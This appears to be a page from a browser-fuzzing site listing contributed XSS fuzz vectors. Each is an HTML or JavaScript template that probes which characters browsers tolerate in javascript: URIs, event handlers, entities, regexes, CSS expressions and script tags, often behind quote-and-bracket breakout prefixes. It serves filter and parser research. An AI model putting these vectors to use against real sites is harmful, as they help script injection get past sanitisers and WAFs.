Featured vector
Chrome 0.0
<!-- sample vector --> <img src=xx:xx 0x0donerror=alert(1)>
<!-- sample vector --> <img src=xx:xx 0x0donerror=alert(1)>
Fuzz vector cloud
Anchor Attributes CSS Closing Comments HTML HTML5 JavaScript Property Protocol Script URL XSS attribute bla bypass challenge char comment data encoding entities entity event events flash for fun handler href img innerHTML navigateURL onload prompt properties regex space src string strings style svg tag tags test testing uri waf xml
3,424,392 Successful fuzzes
Fuzz Vectors
Searching for "JavaScript"
Your browser identified asGeneral Crawlers unknown
All vectors
| Description | Vector | Created by |
|---|---|---|
| Characters in between protocol in js url (FORK) XXX | <a href="javas*chr*cript:alert(1)" id="fuzzelement*num*">test</a> | @igc_iv |
| testerdd | <a href="*chr*javascript:alert(1)" id="fuzzelement*num*">test</a>*num**num* | @script92538206 |
| Characters before javascript uri parsed | <a href="*uni*javascript:alert(1)" id="fuzzelement*num*">test</a> | @freddyb |
| Characters that eat JavaScript regex escapes | <script> var regexChars = /*chr*\$/g if(!("*chr*$".match(regexChars))) { logChr(*num*) } </script> | @tifkin_ |
| Characters that modify JavaScript regex character classes | <script> var regexChars = /[*chr*.]/g if(!(".".match(regexChars))) { logChr(*num*) } <script> | @tifkin_ |
| Characters ignored in Javascript function call with unicode 2 | <script>l\*chr*u006fg(*num*)</script> | @garethheyes |
| Characters ignored in Javascript function call with unicode | <script>l\u006f*chr*g(*num*)</script> | @garethheyes |
| JavaScript characters that swallow the next character | <script>a='asdf*chr*\';logChr(*num*)//asdf'</script> | @tifkin_ |
| Characters that separate JavaScript object key and value | <script> var obj = {"foo"*chr*"bar"}; logChr(*num*) </script> | @peksa |
| JavaScript operators that separate objects and scopes | <script> var v = {}*chr*{"string in blockscope"} logChr(*num*) </script> | @peksa |
| JavaScript operators that evaluate argument in variable assignment | <script> var v = {}*chr*logChr(*num*) </script> | @peksa |
| Things that break from URIs javascript comments | <a href="javascript://*chr*logChr(*num*)">aaa</a> | @0xAli |
| HTML input image tag attributes that run JavaScript | <input *datahtmlattributes*="customLog('*datahtmlattributes*')" type="image" src="about:blank"> | @peksa |
| HTML input tag attributes that run JavaScript | <input *datahtmlattributes*="customLog('*datahtmlattributes*')" type="text"> | @peksa |
| Characters that start JavaScript double quote strings | <script> *chr*"; logChr(*num*) </script> | @peksa |
| Characters that escape JavaScript single line comments | <script> // hmm *chr*logChr(*num*) </script> | @peksa |
| Ignored characters in javascript protocol uris | <script> var a = document.createElement('a'); a.href = "java\u*hex4*script:alert()"; if (a.href === "javascript:alert()") { logChr(*num*); } </script> | @peksa |
| Characters that separate JavaScript assignment statements | <script> var a={}*chr*b={}&logChr(*num*); </script> | @Giutro |
| Characters that allow a new statement to begin2 | <script> var a={}*chr*b=logChr(*num*); </script> | @tifkin_ |
| Characters that allow a new statement to begin | <script> var a={}*chr*logChr(*num*); </script> | @tifkin_ |
| Characters that can be used to terminate entities in an href | <a href="javascript&colon*chr*log(*num*)" id="fuzzelement*num*">test</a> | @tifkin_ |
| Characters that make a double quote valid | <script> *chr*"; logChr(*num*); </script> | @tifkin_ |
| Characters allowed after domain | <a href="http://google.com*chr*breakme" id="fuzzelement*num*">test</a> | @avlidienbrunn |
| Characters allowed before http | <a href="http://*chr*google.com" id="fuzzelement*num*">test</a> | @avlidienbrunn |
| Characters allowed to hex encodings of javascript variables | <script> lo\u*chr*0067Chr(*num*); </script> | @tifkin_ |
| Characters allowed to hex encode javascript | <script> lo\*chr*0067Chr(*num*); </script> | @tifkin_ |
| Protocols before Javascript to run code by using Flash navigateURL | <script> setTimeout("if(document.getElementById('myframe*dataprotocols*').contentWindow.document.location.hash.substring(1)) customLog('*dataprotocols*');",1000) </script> <iframe id="myframe*dataprotocols*" src="http://victim.com/testme/flashtest/link_protocol_test.swf?input=*dataprotocols*javascript:document.location='http://shazzer.co.uk/%23@irsdl'"></iframe> | @irsdl |
| Characters not encoded with encodeURIComponent | <script> chr=String.fromCharCode(*num*); result=''; try{ result=encodeURIComponent(chr); }catch(e){} if(!/%/.test(result)&&result.length) { ids.push(*num*); } </script> | @garethheyes |
| Characters not encoded with encodeURI | <script> chr=String.fromCharCode(*num*); result=''; try{ result=encodeURI(chr); }catch(e){} if(!/%/.test(result)&&result.length) { ids.push(*num*); } </script> | @garethheyes |
| Characters after javascript uri | <a href="javascript*chr*:alert(1)" id="fuzzelement*num*">test</a> | @insertScript |
| Characters before javascript uri | <a href="*chr*javascript:alert(1)" id="fuzzelement*num*">test</a> | @insertScript |
| JS Property check middle character | <img src=xx:xx onerror=window[['log*chr*Chr']](*num*)> | @garethheyes |
| JS Property check ending character | <img src=xx:xx onerror=window[['logChr*chr*']](*num*)> | @garethheyes |
| Characters allowed before slashes no protocol | <a href="*chr*//google.com" id="fuzzelement*num*">test</a> | @garethheyes |
| Characters allowed inside slashes no protocol | <a href="/*chr*/google.com" id="fuzzelement*num*">test</a> | @garethheyes |
| Characters allowed instead of slash 2 | <a href="http:*chr**chr*google.com" id="fuzzelement*num*">test</a> | @garethheyes |
| Characters allowed instead of slash | <a href="http:*chr*google.com" id="fuzzelement*num*">test</a> | @garethheyes |
| Characters allowed after slash | <a href="http:/*chr*/google.com" id="fuzzelement*num*">test</a> | @garethheyes |
| Characters allowed inside http | <a href="ht*chr*tp://google.com" id="fuzzelement*num*">test</a> | @garethheyes |
| Characters allowed instead of forward slash in url | <a href="*chr**chr*google.com" id="fuzzelement*num*">test</a> | @garethheyes |
| Characters allowed instead of colon in js url | <a href="javascript*chr*alert(1)" id="fuzzelement*num*">test</a> | @garethheyes |
| Entities allowed instead of colon for js protocol | htmlStr = '<a href="javascript'+*dataentities*+'123">test</a>'; document.getElementById('placeholder').innerHTML = htmlStr; try { if(document.getElementById('placeholder').firstChild.protocol === 'javascript:') { customLog(*dataentities*); } }catch(e){}; | @peksa |
| Entities allowed after js protocol | htmlStr = '<a href="javascript'+*dataentities*+':123">test</a>'; document.getElementById('placeholder').innerHTML = htmlStr; try { if(document.getElementById('placeholder').firstChild.protocol === 'javascript:') { customLog(*dataentities*); } }catch(e){}; | @garethheyes |
| Entities allowed before js protocol | htmlStr = '<a href="'+*dataentities*+'javascript:123">test</a>'; document.getElementById('placeholder').innerHTML = htmlStr; try { if(document.getElementById('placeholder').firstChild.protocol === 'javascript:') { customLog(*dataentities*); } }catch(e){}; | @garethheyes |
| Determine what character can be at the end of the javascript but before the colon | <!-- sample vector --> <img src=xx:xx *chr*onerror=logChr(*num*)> <a href=javascript*chr*:alert(*num*)>*num*</a> | @MisterJyu |
| Characters to end script tag via JavaScript regex 002 | <script>log(*num*,1</script*chr*//)</script> | @0x6D6172696F |
| Characters to end script tag via JavaScript regex 001 | <script>log(*num*,1</script*chr*/)</script> | @0x6D6172696F |
| Iframe contentDocument properties | <iframe src="http://businessinfo.co.uk" id="iframe"></iframe> <script> window.addEventListener('load', function(){ props=props.concat(Object.getOwnPropertyNames(document)); for(var i=-100;i<100;i++) { props.push(i); } props.forEach(function(){ try{ if(document.getElementById('iframe').contentDocument[arguments[0]])customLog(arguments[0]); }catch(e){}; }) }, false); </script> | @garethheyes |
| Iframe contentWindow properties | <iframe src="http://businessinfo.co.uk" id="iframe"></iframe> <script> window.addEventListener('load', function(){ props=props.concat(Object.getOwnPropertyNames(document)); for(var i=-100;i<100;i++) { props.push(i); } props.forEach(function(){ try{ if(document.getElementById('iframe').contentWindow[arguments[0]])customLog(arguments[0]); }catch(e){}; }) }, false); </script> | @garethheyes |
| Characters eating backslash in javascript string 2 | <script>if("x\*chr*".length==2) { log(*num*);}</script> | @mhswende |
| Characters eating backslash in javascript string | <script>if("x\*chr*".length==1) { log(*num*);}</script> | @mhswende |
| Characters ignored inside javascript string v2 | <script>if("x*chr*x" == "xx") { log(*num*);}</script> | @mhswende |
| Characters ignored in html event handler name | <img src=x on*chr*Error="javascript:log(*num*)"/> | @mhswende |
| Characters ignored in Javascript function call | "`'><script>lo*chr*g(*num*)</script> | @mhswende |
| Uncode sequences generating illegitimate ASCII | <script> "\ud83d\u*hex4*".match(/.*<.*/) ? log(*num*) : null; </script> | @0x6D6172696F |
| Characters allowed after ampersand in named character references | <a href="javascript&*chr*colon;log(*num*)" id="fuzzelement*num*">test</a> | @_cweb |
| Characters consuming backslashes and breaking JS strings | <script>a='abc\*chr*\';log(*num*)//def';</script> | @0x6D6172696F |
| Events in tags with src or href that execute javascript | <*datahtmlelements* data=about:blank background=about:blank action=about:blank type=image/gif src=about:blank href=about:blank *dataevents*="customLog('*datahtmlelements* *dataevents*')"></*datahtmlelements*> | @garethheyes |
| Tags and events that execute javascript 2 | <*datahtmlelements* *dataevents*="javascript:parent.customLog('*datahtmlelements* *dataevents*')"></*datahtmlelements*> | @garethheyes |
| Tags and events that execute javascript | <*datahtmlelements* *datahtmlattributes*="javascript:parent.customLog('*datahtmlelements* *datahtmlattributes*')"></*datahtmlelements*> | @garethheyes |
| Does this browser support e4x | <script>try{eval("<></>");logBoolean(1)}catch(e){logBoolean(0)};</script> | @garethheyes |
| Characters escaping JS comment delimiters 001 | <script>/* **chr*/log(*num*)// */</script> | @0x6D6172696F |
| Characters breaking CSS strings allowing expression | "'`>ABC<div style="font-family:'foo*chr*;x:expression(log(*num*));/*';">DEF | @0x6D6172696F |
| Characters ending CSS values allowing expressions | "'`>ABC<div style="font-family:'foo'*chr*x:expression(log(*num*));/*';">DEF | @0x6D6172696F |
| Characters breaking JavaScript Regex delimiter | "'`><script>a=/hello;*chr*;i=0;log(*num*);a/i;</script> | @0x6D6172696F |
| Characters before paren in Javascript call | "'`><script>log*chr*(*num*)</script> | @garethheyes |
| Characters in between protocol in js url | <a href="javas*chr*cript:alert(1)" id="fuzzelement*num*">test</a> | @garethheyes |
| Characters that close JS Comments | '"`><script>/* **chr*log(*num*)// */</script> | @garethheyes |
| Characters allowed before protocol in js url | <a href="*chr*javascript:alert(1)" id="fuzzelement*num*">test</a> | @garethheyes |
| Characters allowed before colon in js url | <a href="javascript*chr*:alert(1)" id="fuzzelement*num*">test</a> | @garethheyes |
| NULL Characters inside JavaScript properties | `'"><script>window['log*chr*'](*num*)</script> | @garethheyes |
| Characters allowed before a JavaScript function | "`'><script>*chr*log(*num*)</script> | @garethheyes |